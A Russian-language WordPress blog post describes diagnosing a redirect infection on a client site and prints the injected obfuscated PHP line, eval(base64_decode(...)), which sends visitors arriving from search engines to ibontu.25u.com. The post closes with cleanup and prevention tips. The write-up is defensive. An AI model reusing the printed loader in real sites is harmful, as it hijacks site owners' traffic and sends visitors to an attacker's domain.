Как путь по звездам отыскать
Легко
  • Главная
  • SEO
  • WORDPRESS
    • О сайте
    • WP Плагины
    • WP Темы
    • WP E-Commerce
    • html разметка
  • В ОБЩЕМ = НЕ ПО ТЕМЕ
  • Карта сайта
  • Гаджеты
    • Гаджеты
    • Компьютеры и планшеты
    • Телефоны и смартфоны
    • Практикум
    • Программы
    • Сравним
Нет переходов из поисковой выдачи на сайт. Вирус редирект.

Нет переходов из поисковой выдачи на сайт. Вирус редирект.

На одном из сайтов клиента упала (вернее прекратилась совсем) выдача с Яндекса и Гугла.
Оказалось, что при клике по ссылке в выдаче поисковиков происходил редирект на сайт ibontu.25u.com и в результате отсутствовали переходы с Яндекса и Гугла на сайт клиента.
При этом если в адресной строке браузера ввести ссылку на запись сайта, то редиректа нет.

Первое что я проверила, файл .htaccess — как ни странно он был совершенно чистым, без каких-либо даже намеков на лишний код.
Далее я просмотрела файловую структуру и убедилась в том, нет «лишних файлов».
Затем я обновила версию вордпресс и заменила тему. Обычно это всегда помогало. Но! Оказалось это только замедлило решение задачи. Редирект продолжался.
Просмотрела файлы плагинов (которые не были обновлены) и оказалось, что почти в каждом файле .php присутствовал следующий код:

eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhl
YWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWy
dIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCdd
Ow0KaWYgKCR1YWcpIHsNCmlmICghc3RyaXN0cigkdWFnLCJNU0lFIDcuMCIpIGFuZC
Ahc3RyaXN0cigkdWFnLCJNU0lFIDYuMCIpKXsKaWYgKHN0cmlzdHIoJHJlZmVyZXIsI
nlhaG9vIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJl
ZmVyZXIsInJhbWJsZXIiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJsaXZlLmNvbSIpIG9
yIHN0cmlzdHIoJHJlZmVyZXIsIndlYmFsdGEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLC
JiaXQubHkiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9yIHByZ
WdfbWF0Y2goIi95YW5kZXhcLnJ1XC95YW5kc2VhcmNoXD8oLioKVwmbHJcPS8iLCRyZ
WZlcmVyKSBvciBwcmVnX21hdGNoICgiL2dvb2dsZVwuKC4qPylcL3VybFwc2EvIiwkc
mVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJp
c3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20vbCIpIG9yIHN0cmlzdHIoJHJlZmVyZXI
sImFvbC5jb20iKSkgew0KaWYgKCFzdHJpc3RyKCRyZWZlcmVyLCJjYWNoZSIpIG9yIC
FzdHJpc3RyKCRyZWZlcmVyLCJpbnVybCIpKXsNCmhlYWRlcigiTG9jYXRpb246IGh0d
HA6Ly9pYm9udHUuMjV1LmNvbS8iKTsNCmV4aXQoKTsNCn0KfQp9DQp9DQp9"));

Код присутствовал 1, 2, а то и много раз по всему файлу.
Вот такой вирус!
Что делать?
Почистить эту грязь любым доступным способом.
Я скачала все содержимое с хостинга на диск, и почистила с помощью @Text Replacer. Затем залила обратно.
Все сразу же восстановилось!
Можно воспользоваться доступом по SSH, если у вас он есть.
Так же советую включить Файлы логов Apache (у клиента было выключено) и поменять все пароли.

На просторах интернета так же советуют установить плагин для WP, который проверяет целостность файлов и если кто-то внедрит вредоносный код на сайт, в админ-панели появляется информация в какой файл добавлен вирус. Проверку проходят только .php файлы , а JS нет. Я пока не тестировала его. Вот ссылка на блог автора: http://blog.portal.kharkov.ua/2008/06/27/belavir/

Нам этом закругляюсь, Надеюсь мой пост был полезен Вам.

Буду рада любым комментариям, делитесь опытом или задавайте вопросы. Вместе мы сила!

Вера Поклонская

Related Posts

  • Cайт взломан, что делать или Вирус троян JS:Redirector-MC [Trj] (мобильный редирект) на блоге WordPress
  • Украли сайт! Как бороться с сайтом клоном.Украли сайт! Как бороться с сайтом клоном.
  • КАК ВЕРНУТЬ СТАРЫЙ РЕДАКТОР В WORDPRESS 5.0КАК ВЕРНУТЬ СТАРЫЙ РЕДАКТОР В WORDPRESS 5.0
  • Ресурсы по темам WordPressРесурсы по темам WordPress
  • Почему я выбрала движок на WordРress  Почему я выбрала движок на WordРress

Ноябрь 27, 2013 poklonskaya

Написать ответ Cancel reply

Your email address will not be published. Required fields are marked *

Популярные сообщения

  • Установка и Настройка WordPress E-Commerce
    Установка и Настройка WordPress E-Commerce Август 14, 2012
  • ЭФФЕКТЫ НАВЕДЕНИЯ с помощью CSS, переходы и анимация
    ЭФФЕКТЫ НАВЕДЕНИЯ с помощью CSS, переходы и анимация Июль 15, 2015
  • Панель вебмастера
    Панель вебмастера Декабрь 5, 2013
  • Удаление записей рубрики с главной страницы WordPress
    Удаление записей рубрики с главной страницы WordPress Март 28, 2012
  • Требования к сайту с точки зрения SEO продвижения.
    Требования к сайту с точки зрения SEO продвижения. Декабрь 10, 2013

Метки

SEO стратегии WP-тема от ColorLabs Вирусы Сайт-клон доменное имя семантика ссылки
Copyright © 2010-2018 facilite.ru All Rights Reserved
Мы используем куки для наилучшего представления нашего сайта. Если Вы продолжите использовать сайт, мы будем считать что Вас это устраивает.Ok